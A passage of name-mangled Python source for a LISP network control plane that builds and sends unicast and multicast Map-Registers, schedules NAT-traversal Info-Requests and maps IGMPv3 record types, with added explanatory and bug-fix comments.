            iII1ii1.mpriority = 255
            iII1ii1.mweight = 0
            iII1ii1.local_bit = False
            iII1ii1.reach_bit = True
            o00o0 += iII1ii1.encode()
            if (not quiet): iII1ii1.print_record(" RTR ")
        if 42 - 42: OoO0O00
        if 19 - 19: iiiiIi11i % oOoO0oo0OOOo * iIii1I11I1II1 + oo
        if 46 - 46: OoO0O00
        if 1 - 1: i1I1ii1II1iII
        if 97 - 97: II11iiII + i1I1ii1II1iII + O0 + i11iIiiIii
        o000oo += 1
    if 77 - 77: Ooo00oOo00o / OoooooooOO
    return(o00o0, o000oo)
if 46 - 46: Ooo00oOo00o % iIii1I11I1II1 . i1I1ii1II1iII % i1I1ii1II1iII + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * o0000oOoOoO0o % Oo / ooOO00oOo
if 35 - 35: Oo + i1IIi % oOoO0oo0OOOo % OoOO0ooOOoo0O + iiiiIi11i
if 17 - 17: i1IIi
if 21 - 21: OoO0O00
if 29 - 29: OoOO0ooOOoo0O / II111iiii / Oo * II11iiII
if 10 - 10: o0oo0o % oooO0oo0oOOOO * oooO0oo0oOOOO . OoOO0ooOOoo0O / o0000oOoOoO0o % II11iiII
if 49 - 49: ooOO00oOo / iiiiIi11i + O0 * Ooo00oOo00o
def O00oO000O0O(lisp_sockets, ttl, eid_only, ms_only, refresh):
    # Build and send Map-Registers for the database-mapping list.
    #
    #   lisp_sockets -- sockets passed to lisp.lisp_send_map_register()
    #   ttl          -- record TTL; None means lisp.LISP_REGISTER_TTL
    #   eid_only     -- register just this EID (None registers everything)
    #   ms_only      -- restrict to one map-server (None means all)
    #   refresh      -- refresh-bit value for map-servers configured with
    #                   refresh-registrations
    if 28 - 28: Oo + i11iIiiIii / OoOO0ooOOoo0O % oOo0O0Ooo % OoO0O00 - O0
    if 54 - 54: i1IIi + II111iiii
    if 83 - 83: oOoO0oo0OOOo - oo + II11iiII
    if 5 - 5: o0000oOoOoO0o
    if (eid_only != None):
        iIi1i1iIi1iI = 1
    else:
        iIi1i1iIi1iI = lisp.lisp_db_list_length()
        if (iIi1i1iIi1iI == 0): return
    if 26 - 26: OoooooooOO * oo + II11iiII
    if 24 - 24: i11iIiiIii % iIii1I11I1II1 + II11iiII / i11iIiiIii
    lisp.lprint("Build Map-Register for {} database-mapping entries".format(iIi1i1iIi1iI))
    if 70 - 70: ooOO00oOo * O0 . OoOO0ooOOoo0O + oo . oooO0oo0oOOOO
    if 14 - 14: iIii1I11I1II1 % iIii1I11I1II1 * i11iIiiIii - ooOO00oOo - OoOO0ooOOoo0O
    if 63 - 63: ooOO00oOo
    if 69 - 69: iIii1I11I1II1 . oOoO0oo0OOOo % Oo + iIii1I11I1II1 / O0 / oOoO0oo0OOOo
    if 61 - 61: II11iiII % II11iiII * Ooo00oOo00o / Ooo00oOo00o
    # Suppress per-record logging when there are many entries.
    o0 = (iIi1i1iIi1iI > 12)
    if 96 - 96: oOo0O0Ooo . Ooo00oOo00o - Oo
    if 99 - 99: oooO0oo0oOOOO . OoO0O00 - o0000oOoOoO0o % o0000oOoOoO0o * O0 . II111iiii
    if 4 - 4: o0000oOoOoO0o
    if 51 - 51: ooOO00oOo - O0 % iiiiIi11i - II111iiii
    if 31 - 31: i1I1ii1II1iII / OoO0O00 - i1I1ii1II1iII - II11iiII
    # Per-ms-name list of [record-bytes, record-count] chunks; a fresh
    # chunk is started every 20 records (see below) so each Map-Register
    # stays bounded.
    I1iiIIIi11 = {}
    for O0O0O in lisp.lisp_map_servers_list.values():
        if (ms_only != None and O0O0O != ms_only): continue
        I1iiIIIi11[O0O0O.ms_name] = []
    if 12 - 12: OoooooooOO % Ooo00oOo00o * OoOO0ooOOoo0O % iIii1I11I1II1 / o0000oOoOoO0o
    if 27 - 27: i11iIiiIii % II111iiii % OoOO0ooOOoo0O . O0 - OoO0O00 + oOo0O0Ooo
    if 57 - 57: iIii1I11I1II1 / OoOO0ooOOoo0O - i1IIi
    if 51 - 51: oooO0oo0oOOOO
    if 25 - 25: OoooooooOO + oooO0oo0oOOOO * oOoO0oo0OOOo
    OoO0ooO = lisp.lisp_map_register()
    OoO0ooO.nonce = 0xaabbccdddfdfdf00
    OoO0ooO.xtr_id_present = True
    if 51 - 51: i1I1ii1II1iII / Oo * oOo0O0Ooo . i1I1ii1II1iII / oOoO0oo0OOOo / i11iIiiIii
    if (ttl == None): ttl = lisp.LISP_REGISTER_TTL
    if 21 - 21: iiiiIi11i / oOoO0oo0OOOo + o0000oOoOoO0o + OoooooooOO
    if 91 - 91: i11iIiiIii / i1IIi + i1I1ii1II1iII + Oo * i11iIiiIii
    if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + OoOO0ooOOoo0O * o0oo0o . oooO0oo0oOOOO
    if 52 - 52: Oo + O0 . i1I1ii1II1iII . oOoO0oo0OOOo . ooOO00oOo
    # Accumulate encoded EID-records per database-mapping entry into the
    # current chunk for that entry's map-server name.
    for oo000 in lisp.lisp_db_list:
        if 32 - 32: i1IIi . o0000oOoOoO0o
        if 59 - 59: OoooooooOO
        if 47 - 47: Oo - oo / II111iiii
        if 12 - 12: II11iiII
        if (I1iiIIIi11.has_key(oo000.use_ms_name) == False): continue
        if 83 - 83: i1I1ii1II1iII . O0 / OoO0O00 / II11iiII - II111iiii
        oO0oO0 = I1iiIIIi11[oo000.use_ms_name]
        if (oO0oO0 == []):
            # First entry for this ms-name: start chunk ["", 0].
            oO0oO0 = ["", 0]
            I1iiIIIi11[oo000.use_ms_name].append(oO0oO0)
        else:
            # Continue filling the most recent chunk.
            oO0oO0 = I1iiIIIi11[oo000.use_ms_name][-1]
        if 14 - 14: i1I1ii1II1iII
        if 99 - 99: i1I1ii1II1iII
        if 38 - 38: oOoO0oo0OOOo - i1I1ii1II1iII / O0 . o0oo0o
        if 45 - 45: o0oo0o
        if 83 - 83: oOo0O0Ooo . OoooooooOO
        if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / oooO0oo0oOOOO / i11iIiiIii
        if 62 - 62: ooOO00oOo / oOoO0oo0OOOo
        if 7 - 7: OoooooooOO . oooO0oo0oOOOO
        if 53 - 53: o0000oOoOoO0o % o0000oOoOoO0o * Ooo00oOo00o + oOo0O0Ooo
        if 92 - 92: OoooooooOO + i1IIi / o0000oOoOoO0o * O0
        o00o0 = ""
        if (oo000.dynamic_eid_configured()):
            # Register each discovered dynamic-EID under this entry.
            for O00oOo00o0o in oo000.dynamic_eids.values():
                O00oO0 = O00oOo00o0o.dynamic_eid
                if (eid_only == None or eid_only.is_exact_match(O00oO0)):
                    O0Oo00OoOo, o000oo = O00OO(o0, oo000,
                        O00oO0, oo000.group, ttl)
                    o00o0 += O0Oo00OoOo
                    oO0oO0[1] += o000oo
            if 24 - 24: i11iIiiIii - o0oo0o
            if 21 - 21: OoOO0ooOOoo0O
        else:
            if (eid_only == None):
                o00o0, o000oo = O00OO(o0, oo000,
                    oo000.eid, oo000.group, ttl)
                oO0oO0[1] += o000oo
            if 92 - 92: i11iIiiIii / o0oo0o - i1I1ii1II1iII % Oo * o0oo0o + OoO0O00
        if 11 - 11: OoooooooOO . o0oo0o
        if 80 - 80: OoooooooOO - II11iiII * o0000oOoOoO0o * oOoO0oo0OOOo / oo / II11iiII
        if 13 - 13: o0oo0o * Oo + i11iIiiIii * o0oo0o - Oo
        if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * oooO0oo0oOOOO
        if 9 - 9: oooO0oo0oOOOO - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
        oO0oO0[0] += o00o0
        if 39 - 39: oooO0oo0oOOOO * OoO0O00 + iIii1I11I1II1 - oooO0oo0oOOOO + II11iiII
        # Cap each Map-Register at 20 records; start a new chunk.
        if (oO0oO0[1] == 20):
            oO0oO0 = ["", 0]
            I1iiIIIi11[oo000.use_ms_name].append(oO0oO0)
    if 69 - 69: O0
    if 85 - 85: Oo / O0
    if 18 - 18: Ooo00oOo00o % O0 * oOoO0oo0OOOo
    if 62 - 62: o0oo0o . oooO0oo0oOOOO . OoooooooOO
    if 11 - 11: II11iiII / OoOO0ooOOoo0O
    if 73 - 73: i1IIi / i11iIiiIii
    # Send one Map-Register per non-empty chunk to each map-server.
    for O0O0O in lisp.lisp_map_servers_list.values():
        if (ms_only != None and O0O0O != ms_only): continue
        if 58 - 58: OoO0O00 . II111iiii + iiiiIi11i - i11iIiiIii / II111iiii / O0
        for oO0oO0 in I1iiIIIi11[O0O0O.ms_name]:
            if 85 - 85: oOo0O0Ooo + II11iiII
            if 10 - 10: oooO0oo0oOOOO / ooOO00oOo + oOo0O0Ooo / i1IIi
            if 27 - 27: o0000oOoOoO0o
            if 67 - 67: oo
            OoO0ooO.record_count = oO0oO0[1]
            if (OoO0ooO.record_count == 0): continue
            if 55 - 55: oOoO0oo0OOOo - i1I1ii1II1iII * Ooo00oOo00o + oOo0O0Ooo * oOo0O0Ooo * O0
            OoO0ooO.nonce += 1
            OoO0ooO.alg_id = O0O0O.alg_id
            OoO0ooO.key_id = O0O0O.key_id
            OoO0ooO.proxy_reply_requested = O0O0O.proxy_reply
            OoO0ooO.merge_register_requested = O0O0O.merge_registrations
            OoO0ooO.map_notify_requested = O0O0O.want_map_notify
            OoO0ooO.xtr_id = O0O0O.xtr_id
            OoO0ooO.site_id = O0O0O.site_id
            OoO0ooO.encrypt_bit = (O0O0O.ekey != None)
            if (O0O0O.refresh_registrations):
                OoO0ooO.map_register_refresh = refresh
            if 91 - 91: o0oo0o - II11iiII % iIii1I11I1II1 - OoooooooOO % Oo
            if (O0O0O.ekey != None): OoO0ooO.encryption_key_id = O0O0O.ekey_id
            OO0 = OoO0ooO.encode()
            OoO0ooO.print_map_register()
            if 44 - 44: i1I1ii1II1iII - o0oo0o / O0 * OoO0O00 + II111iiii / oOo0O0Ooo
            if 88 - 88: Ooo00oOo00o - ooOO00oOo + oOoO0oo0OOOo . o0oo0o % o0oo0o
            if 57 - 57: II111iiii
            if 54 - 54: OoO0O00 + iiiiIi11i + i11iIiiIii
            if 28 - 28: iiiiIi11i
            # Header + this chunk's EID-records + trailing xTR-ID.
            ooo000o0ooO0 = OoO0ooO.encode_xtr_id("")
            o00o0 = oO0oO0[0]
            OO0 = OO0 + o00o0 + ooo000o0ooO0
            if 10 - 10: Oo . i1I1ii1II1iII + ooOO00oOo / OoooooooOO - i1I1ii1II1iII / OoOO0ooOOoo0O
            O0O0O.map_registers_sent += 1
            lisp.lisp_send_map_register(lisp_sockets, OO0, OoO0ooO, O0O0O)
            # Brief pause between packets to avoid bursting.
            time.sleep(.001)
        if 76 - 76: Ooo00oOo00o % oo . iIii1I11I1II1 - oooO0oo0oOOOO * OoooooooOO . i1I1ii1II1iII
        if 84 - 84: o0oo0o + OoOO0ooOOoo0O
        if 28 - 28: iiiiIi11i - i11iIiiIii . oOoO0oo0OOOo + oooO0oo0oOOOO / oOoO0oo0OOOo
        if 35 - 35: oooO0oo0oOOOO
        if 75 - 75: OoO0O00 / oOoO0oo0OOOo . oooO0oo0oOOOO * II11iiII - II111iiii
        # Re-resolve the map-server's dns-name in case it changed.
        O0O0O.resolve_dns_name()
        if 41 - 41: o0000oOoOoO0o
        if 77 - 77: o0oo0o
        if 65 - 65: II111iiii . oo % iiiiIi11i * ooOO00oOo
        if 38 - 38: oOo0O0Ooo / i1I1ii1II1iII % OoO0O00
        if 11 - 11: i1I1ii1II1iII - iiiiIi11i + II111iiii - iIii1I11I1II1
        if (ms_only != None and O0O0O == ms_only): break
    if 7 - 7: oooO0oo0oOOOO - OoOO0ooOOoo0O / II111iiii * o0000oOoOoO0o . i1I1ii1II1iII * i1I1ii1II1iII
    return
if 61 - 61: OoOO0ooOOoo0O % Oo - ooOO00oOo / OoO0O00
if 4 - 4: OoooooooOO - i1IIi % o0000oOoOoO0o - II11iiII * Ooo00oOo00o
if 85 - 85: OoooooooOO * iIii1I11I1II1 . i1I1ii1II1iII / OoooooooOO % oo % O0
if 36 - 36: o0000oOoOoO0o / II111iiii / oooO0oo0oOOOO / oooO0oo0oOOOO + oOoO0oo0OOOo
if 95 - 95: oooO0oo0oOOOO
if 51 - 51: II111iiii + oooO0oo0oOOOO . i1IIi . oOoO0oo0OOOo + oOo0O0Ooo * oo
if 72 - 72: iiiiIi11i + iiiiIi11i / II111iiii . OoooooooOO % o0000oOoOoO0o
if 49 - 49: iiiiIi11i . ooOO00oOo - OoO0O00 * OoooooooOO . OoO0O00
if 2 - 2: OoooooooOO % II11iiII
def oOo0O(ms):
    """Periodic Info-Request driver for NAT-traversal.

    Sends an Info-Request to map-server 'ms' on the control port and to
    each known RTR on the data port, then re-arms itself to fire every
    lisp.LISP_INFO_INTERVAL seconds with ms=None.
    """
    global oOOoo00O0O
    global i1111

    lisp.lisp_set_exception()

    # Solicit the map-server on the control port.
    info_sockets = [i1111, i1111, I11]
    lisp.lisp_build_info_requests(info_sockets, ms, lisp.LISP_CTRL_PORT)

    # When LISP_RTR_BEHIND_NAT is set in the environment, RTRs with
    # private addresses are skipped.
    env_unset = (os.getenv("LISP_RTR_BEHIND_NAT") == None)
    for rtr in lisp.lisp_rtr_list.values():
        if (rtr == None): continue
        if (rtr.is_private_address() and env_unset == False):
            pretty = lisp.red(rtr.print_address_no_iid(), False)
            lisp.lprint("Skip over RTR private address {}".format(pretty))
            continue
        lisp.lisp_build_info_requests(info_sockets, rtr, lisp.LISP_DATA_PORT)

    # Restart the interval timer.
    oOOoo00O0O.cancel()
    oOOoo00O0O = threading.Timer(lisp.LISP_INFO_INTERVAL,
        oOo0O, [None])
    oOOoo00O0O.start()
    return
if 25 - 25: i1IIi . ooOO00oOo - oOo0O0Ooo / ooOO00oOo % ooOO00oOo * iIii1I11I1II1
if 50 - 50: ooOO00oOo . i11iIiiIii - iiiiIi11i . iiiiIi11i
if 31 - 31: II11iiII / OoO0O00 * i1IIi . oOo0O0Ooo
if 57 - 57: II11iiII + iIii1I11I1II1 % i1IIi % oo
if 83 - 83: Ooo00oOo00o / i11iIiiIii % iIii1I11I1II1 . OoOO0ooOOoo0O % iiiiIi11i . OoooooooOO
if 94 - 94: o0000oOoOoO0o + iIii1I11I1II1 % ooOO00oOo
if 93 - 93: o0000oOoOoO0o - II11iiII + iIii1I11I1II1 * Ooo00oOo00o + o0oo0o . i1I1ii1II1iII
def ooO0o0Oo(lisp_sockets):
    """Periodic Map-Register timer handler.

    Refreshes registrations for every database-mapping entry, also
    (re)registers the broadcast MAC entry when an L2 overlay is in use,
    then re-arms itself.
    """
    global o0oOoO00o
    global i1111

    lisp.lisp_set_exception()

    # Refresh-register the entire database-mapping list to all
    # map-servers.
    O00oO000O0O(lisp_sockets, None, None, None, True)

    # For L2 overlays, register the (*, ffff-ffff-ffff) broadcast entry.
    if (lisp.lisp_l2_overlay):
        broadcast_entry = [None, "ffff-ffff-ffff", True]
        iIIIiIii(lisp_sockets, [broadcast_entry])

    # Re-arm the periodic register timer.
    if (o0oOoO00o): o0oOoO00o.cancel()
    o0oOoO00o = threading.Timer(oOOoo,
        ooO0o0Oo, [Oo0o0000o0o0])
    o0oOoO00o.start()
    return
if 63 - 63: oo % o0oo0o * Ooo00oOo00o + o0oo0o / OoO0O00 % i1I1ii1II1iII
if 45 - 45: oooO0oo0oOOOO
if 20 - 20: OoooooooOO * Ooo00oOo00o * O0 . II11iiII
if 78 - 78: iIii1I11I1II1 + OoOO0ooOOoo0O - o0000oOoOoO0o * o0oo0o - OoooooooOO % oOo0O0Ooo
if 34 - 34: O0
if 80 - 80: i1IIi - OoO0O00 / ooOO00oOo - i11iIiiIii
if 68 - 68: iiiiIi11i - oOoO0oo0OOOo % O0 % o0oo0o
if 11 - 11: O0 / ooOO00oOo % II11iiII + Ooo00oOo00o + iIii1I11I1II1
if 40 - 40: Oo - II11iiII . o0000oOoOoO0o * OoO0O00 % o0oo0o
def OoO(group_str, group_mapping):
    """Match an IPv4 group address against one group-mapping.

    Returns the mapping's group-prefix mask length when 'group_str'
    falls inside group_mapping.group_prefix, otherwise -1.
    """
    prefix = group_mapping.group_prefix
    candidate = lisp.lisp_address(lisp.LISP_AFI_IPV4, group_str, 32,
        prefix.instance_id)
    return(prefix.mask_len if candidate.is_more_specific(prefix) else -1)
if 49 - 49: II11iiII . iIii1I11I1II1
if 62 - 62: oOo0O0Ooo / oo - oOoO0oo0OOOo - oo + i11iIiiIii + i1IIi
if 23 - 23: i1I1ii1II1iII + OoOO0ooOOoo0O . oOo0O0Ooo * oo + oOoO0oo0OOOo
if 18 - 18: oooO0oo0oOOOO * Ooo00oOo00o . oooO0oo0oOOOO / O0
if 8 - 8: Ooo00oOo00o
if 4 - 4: oOoO0oo0OOOo + oOoO0oo0OOOo * Oo - oOo0O0Ooo
if 78 - 78: o0000oOoOoO0o / II111iiii % oOo0O0Ooo
if 52 - 52: II11iiII - i1I1ii1II1iII * iiiiIi11i
if 17 - 17: OoooooooOO + II11iiII * OoOO0ooOOoo0O * oOo0O0Ooo
if 36 - 36: O0 + OoO0O00
if 5 - 5: OoO0O00 * oOo0O0Ooo
def iIIIiIii(lisp_sockets, entries):
    """Build and send multicast Map-Registers for (source, group) entries.

    'entries' is a list of [source, group, joinleave] triples where a
    None source means "expand against the configured group-mappings".
    Each expanded entry yields one EID-record carrying an RLE RLOC-record
    plus one low-priority RLOC-record per known RTR.  One Map-Register is
    then sent per map-server with that map-server's record count.

    Fix: the original assigned O0O0O.key_id to OoO0ooO.alg_id a second
    time and never set OoO0ooO.key_id; this now mirrors the unicast
    Map-Register builder (alg_id then key_id).
    """
    ii1I11iIiIII1 = len(entries)
    if (ii1I11iIiIII1 == 0): return

    # Determine address-family from the first group address's syntax.
    IiiiIiiI = None
    if (entries[0][1].find(":") != -1): IiiiIiiI = lisp.LISP_AFI_IPV6
    if (entries[0][1].find(".") != -1): IiiiIiiI = lisp.LISP_AFI_IPV4
    if (entries[0][1].find("-") != -1): IiiiIiiI = lisp.LISP_AFI_MAC
    if (IiiiIiiI == None):
        lisp.lprint("lisp_send_multicast_map_register() invalid group address")
        return

    # Keep only (*, G) entries; they are re-expanded below against the
    # configured group-mappings.
    oO00oOo0OOO = []
    for II1iIi11, i1111IIiii1, ii1 in entries:
        if (II1iIi11 != None): continue
        oO00oOo0OOO.append([i1111IIiii1, ii1])

    # For each group find the longest-match group-mapping and emit one
    # entry per configured source, or a single (0.0.0.0, G) entry when
    # the mapping has no sources.
    entries = []
    for i1111IIiii1, ii1 in oO00oOo0OOO:
        OoOo00 = None
        for o0OO0oOO0O0 in lisp.lisp_group_mapping_list.values():
            O00OOOo0 = OoO(i1111IIiii1, o0OO0oOO0O0)
            if (O00OOOo0 == -1): continue
            if (OoOo00 == None or O00OOOo0 > OoOo00.group_prefix.mask_len):
                OoOo00 = o0OO0oOO0O0

        if (OoOo00 == None):
            lisp.lprint("No group-mapping for {}, could be underlay group".format(i1111IIiii1))
            continue

        lisp.lprint("Use group-mapping '{}' {} for group {}".format(OoOo00.group_name, OoOo00.group_prefix.print_prefix(), i1111IIiii1))

        II1I = OoOo00.group_prefix.instance_id
        oO0Oo = OoOo00.use_ms_name
        i1I = OoOo00.rle_address

        if (len(OoOo00.sources) == 0):
            entries.append(["0.0.0.0", i1111IIiii1, II1I, oO0Oo, i1I, ii1])
            continue
        for o0O00oOoOO in OoOo00.sources:
            entries.append([o0O00oOoOO, i1111IIiii1, II1I, oO0Oo, i1I, ii1])

    ii1I11iIiIII1 = len(entries)
    if (ii1I11iIiIII1 == 0): return

    lisp.lprint("Build Map-Register for {} multicast entries".format(ii1I11iIiIII1))

    # Single RLE node shared by every RLOC-record; its address is chosen
    # per entry below: a NAT-translated RLOC first, then the mapping's
    # rle-address, then our first local RLOC.
    ii111Ii11iii = lisp.lisp_rle_node()
    ii111Ii11iii.level = 128
    o00 = lisp.lisp_get_any_translated_rloc()
    i1I = lisp.lisp_rle("")
    i1I.rle_nodes.append(ii111Ii11iii)

    # Per-ms-name [record-bytes, record-count] accumulator.
    I1iiIIIi11 = {}
    for O0O0O in lisp.lisp_map_servers_list.values():
        I1iiIIIi11[O0O0O.ms_name] = ["", 0]

    # Advertise our hostname in RLOC-records when NAT-traversal is on.
    I1i = None
    if (lisp.lisp_nat_traversal): I1i = lisp.lisp_hostname

    # Count known RTRs so rloc_count can be set per EID-record.
    oO0oooooo = 0
    for OooooOoooO in lisp.lisp_rtr_list.values():
        if (OooooOoooO == None): continue
        oO0oooooo += 1

    # NOTE(review): o00o0 accumulates across entries (it is never reset
    # inside the loop) and the send loop below appends the final o00o0 to
    # every Map-Register; the per-ms byte accumulator is written but never
    # read.  Preserved as-is from the original -- confirm against upstream
    # before changing.
    o00o0 = ""
    for II1iIi11, i1111IIiii1, II1I, oO0Oo, IIIIIiII1, ii1 in entries:
        if (oO0Oo not in I1iiIIIi11): continue

        II1I1I1Ii = lisp.lisp_eid_record()
        II1I1I1Ii.rloc_count = 1 + oO0oooooo
        II1I1I1Ii.authoritative = True
        # A leave deregisters by advertising TTL 0.
        II1I1I1Ii.record_ttl = lisp.LISP_REGISTER_TTL if ii1 else 0
        II1I1I1Ii.eid = lisp.lisp_address(IiiiIiiI, II1iIi11, 0, II1I)
        if (II1I1I1Ii.eid.address == 0): II1I1I1Ii.eid.mask_len = 0
        II1I1I1Ii.group = lisp.lisp_address(IiiiIiiI, i1111IIiii1, 0, II1I)
        if (II1I1I1Ii.group.is_mac_broadcast() and II1I1I1Ii.eid.address == 0): II1I1I1Ii.eid.mask_len = 0

        lisp.lprint(" EID-prefix {} for ms-name '{}'".format(lisp.green(II1I1I1Ii.print_eid_tuple(), False), oO0Oo))

        o00o0 += II1I1I1Ii.encode()
        II1I1I1Ii.print_record(" ", False)
        I1iiIIIi11[oO0Oo][1] += 1

        # The RLE RLOC-record for this (S, G).
        iII1ii1 = lisp.lisp_rloc_record()
        iII1ii1.rloc_name = I1i

        if (o00 != None):
            ii111Ii11iii.address = o00
        elif (IIIIIiII1 != None):
            ii111Ii11iii.address = IIIIIiII1
        else:
            ii111Ii11iii.address = IIIIIiII1 = lisp.lisp_myrlocs[0]

        iII1ii1.rle = i1I
        iII1ii1.local_bit = True
        iII1ii1.reach_bit = True
        iII1ii1.priority = 255
        iII1ii1.weight = 0
        iII1ii1.mpriority = 1
        iII1ii1.mweight = 100
        o00o0 += iII1ii1.encode()
        iII1ii1.print_record(" ")

        # One low-priority RLOC-record per known RTR.
        for OooooOoooO in lisp.lisp_rtr_list.values():
            if (OooooOoooO == None): continue
            iII1ii1 = lisp.lisp_rloc_record()
            iII1ii1.rloc.copy_address(OooooOoooO)
            iII1ii1.priority = 254
            iII1ii1.rloc_name = "RTR"
            iII1ii1.weight = 0
            iII1ii1.mpriority = 255
            iII1ii1.mweight = 0
            iII1ii1.local_bit = False
            iII1ii1.reach_bit = True
            o00o0 += iII1ii1.encode()
            iII1ii1.print_record(" RTR ")

        I1iiIIIi11[oO0Oo][0] += o00o0

    # Build the Map-Register header shared by all map-servers.
    OoO0ooO = lisp.lisp_map_register()
    OoO0ooO.nonce = 0xaabbccdddfdfdf00
    OoO0ooO.xtr_id_present = True
    OoO0ooO.proxy_reply_requested = True
    OoO0ooO.map_notify_requested = False
    OoO0ooO.merge_register_requested = True

    # Send one Map-Register per map-server that has records.
    for O0O0O in lisp.lisp_map_servers_list.values():
        if (O0O0O.ms_name not in I1iiIIIi11): continue

        OoO0ooO.record_count = I1iiIIIi11[O0O0O.ms_name][1]
        if (OoO0ooO.record_count == 0): continue

        OoO0ooO.nonce += 1
        OoO0ooO.alg_id = O0O0O.alg_id
        # Bug fix: was "OoO0ooO.alg_id = O0O0O.key_id", leaving key_id
        # unset (compare the unicast Map-Register builder).
        OoO0ooO.key_id = O0O0O.key_id
        OoO0ooO.xtr_id = O0O0O.xtr_id
        OoO0ooO.site_id = O0O0O.site_id
        OoO0ooO.encrypt_bit = (O0O0O.ekey != None)
        OO0 = OoO0ooO.encode()
        OoO0ooO.print_map_register()

        # Header + EID-records + trailing xTR-ID.
        ooo000o0ooO0 = OoO0ooO.encode_xtr_id("")
        OO0 = OO0 + o00o0 + ooo000o0ooO0

        O0O0O.map_registers_multicast_sent += 1
        lisp.lisp_send_map_register(lisp_sockets, OO0, OoO0ooO, O0O0O)

        # Re-resolve the map-server's dns-name in case it changed, and
        # pause briefly between packets.
        O0O0O.resolve_dns_name()
        time.sleep(.001)
    return
if 4 - 4: II111iiii . OoOO0ooOOoo0O + o0000oOoOoO0o * o0oo0o . Oo
if 87 - 87: oOo0O0Ooo / ooOO00oOo / i11iIiiIii
if 74 - 74: iiiiIi11i / oOoO0oo0OOOo % Ooo00oOo00o
if 88 - 88: oOo0O0Ooo - i11iIiiIii % Ooo00oOo00o * OoOO0ooOOoo0O + oOoO0oo0OOOo
if 52 - 52: II111iiii . oo + oOo0O0Ooo % ooOO00oOo
# Human-readable names for the IGMPv3 group-record types (values 1-6,
# per RFC 3376 section 4.2.12).  Used when logging parsed records and to
# reject unknown record types.
oo0O0o00 = {
    1 : "include-mode" ,
    2 : "exclude-mode" ,
    3 : "change-to-include" ,
    4 : "change-to-exclude" ,
    5 : "allow-new-source" ,
    6 : "block-old-sources" ,
}
if 70 - 70: ooOO00oOo
if 46 - 46: OoOO0ooOOoo0O - i1IIi
if 46 - 46: o0oo0o % o0000oOoOoO0o
if 72 - 72: iIii1I11I1II1
if 45 - 45: OoO0O00 - Ooo00oOo00o % o0oo0o
if 38 - 38: o0oo0o % II11iiII - OoooooooOO
if 87 - 87: ooOO00oOo % oo
if 77 - 77: iIii1I11I1II1 - i1IIi . iiiiIi11i
if 26 - 26: Ooo00oOo00o * oooO0oo0oOOOO . i1IIi
if 59 - 59: O0 + i1IIi - Ooo00oOo00o
if 62 - 62: i11iIiiIii % II11iiII . oooO0oo0oOOOO . II11iiII
if 84 - 84: i11iIiiIii * ooOO00oOo
if 18 - 18: II11iiII - o0000oOoOoO0o - oOo0O0Ooo / o0oo0o - O0
if 30 - 30: O0 + oOoO0oo0OOOo + II111iiii
if 14 - 14: Ooo00oOo00o / II11iiII - iIii1I11I1II1 - iiiiIi11i % Oo
if 49 - 49: Oo * iiiiIi11i / Ooo00oOo00o / OoO0O00 * iIii1I11I1II1
if 57 - 57: oOo0O0Ooo - iiiiIi11i / Oo % i11iIiiIii
if 3 - 3: i1I1ii1II1iII . Oo % oo + oOoO0oo0OOOo
if 64 - 64: i1IIi
if 29 - 29: Ooo00oOo00o / i11iIiiIii / oo % iiiiIi11i % i11iIiiIii
if 18 - 18: II11iiII + o0oo0o
if 80 - 80: iiiiIi11i + Ooo00oOo00o * o0000oOoOoO0o + ooOO00oOo
if 75 - 75: OoOO0ooOOoo0O / Ooo00oOo00o / II11iiII / oooO0oo0oOOOO % Oo + II111iiii
if 4 - 4: i1I1ii1II1iII - OoO0O00 - oooO0oo0oOOOO - OoOO0ooOOoo0O % i11iIiiIii / ooOO00oOo
if 50 - 50: Oo + i1IIi
if 31 - 31: o0000oOoOoO0o
if 78 - 78: i11iIiiIii + Ooo00oOo00o + o0oo0o / Ooo00oOo00o % iIii1I11I1II1 % oooO0oo0oOOOO
if 83 - 83: iIii1I11I1II1 % oOo0O0Ooo % Ooo00oOo00o % o0oo0o . oOoO0oo0OOOo % O0
if 47 - 47: Ooo00oOo00o
if 66 - 66: oo - oooO0oo0oOOOO
if 33 - 33: oo / ooOO00oOo
if 12 - 12: II111iiii
if 2 - 2: i1IIi - oo + OoOO0ooOOoo0O . II111iiii
if 25 - 25: iiiiIi11i
if 34 - 34: oOo0O0Ooo . iIii1I11I1II1 % O0
if 43 - 43: oOoO0oo0OOOo - i1I1ii1II1iII
if 70 - 70: i1I1ii1II1iII / II11iiII % Oo - o0000oOoOoO0o
if 47 - 47: i1I1ii1II1iII
if 92 - 92: II11iiII + oOo0O0Ooo % i1IIi
if 23 - 23: o0oo0o - II11iiII + o0000oOoOoO0o - oOo0O0Ooo * oOo0O0Ooo . OoO0O00
if 47 - 47: iiiiIi11i % iIii1I11I1II1
if 11 - 11: oo % o0000oOoOoO0o - ooOO00oOo - iiiiIi11i + Ooo00oOo00o
if 98 - 98: i1I1ii1II1iII + o0000oOoOoO0o - ooOO00oOo
if 79 - 79: II11iiII / o0oo0o . oOo0O0Ooo - oOoO0oo0OOOo
if 47 - 47: OoooooooOO % O0 * i1I1ii1II1iII . o0000oOoOoO0o
if 38 - 38: O0 - oooO0oo0oOOOO % o0oo0o
if 64 - 64: iIii1I11I1II1
if 15 - 15: oOoO0oo0OOOo + II11iiII / oOoO0oo0OOOo / o0oo0o
if 31 - 31: Oo + O0 + Oo . iIii1I11I1II1 + OoO0O00 / Ooo00oOo00o
if 6 - 6: OoO0O00 % oooO0oo0oOOOO * OoOO0ooOOoo0O / oo + OoO0O00
if 39 - 39: oOo0O0Ooo - OoO0O00 / i1I1ii1II1iII * OoooooooOO
if 100 - 100: O0 . OoOO0ooOOoo0O . ooOO00oOo + O0 * iiiiIi11i
if 42 - 42: iiiiIi11i % OoooooooOO + Ooo00oOo00o
if 56 - 56: OoooooooOO + oOoO0oo0OOOo - i1I1ii1II1iII
if 24 - 24: Ooo00oOo00o + Oo + OoOO0ooOOoo0O - iIii1I11I1II1
if 49 - 49: OoOO0ooOOoo0O . Oo * oOo0O0Ooo % oooO0oo0oOOOO . O0
if 48 - 48: O0 * o0000oOoOoO0o - O0 / o0000oOoOoO0o + oOo0O0Ooo
if 52 - 52: ooOO00oOo % o0000oOoOoO0o * II111iiii
if 4 - 4: OoOO0ooOOoo0O % O0 - OoooooooOO + Oo . iiiiIi11i % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
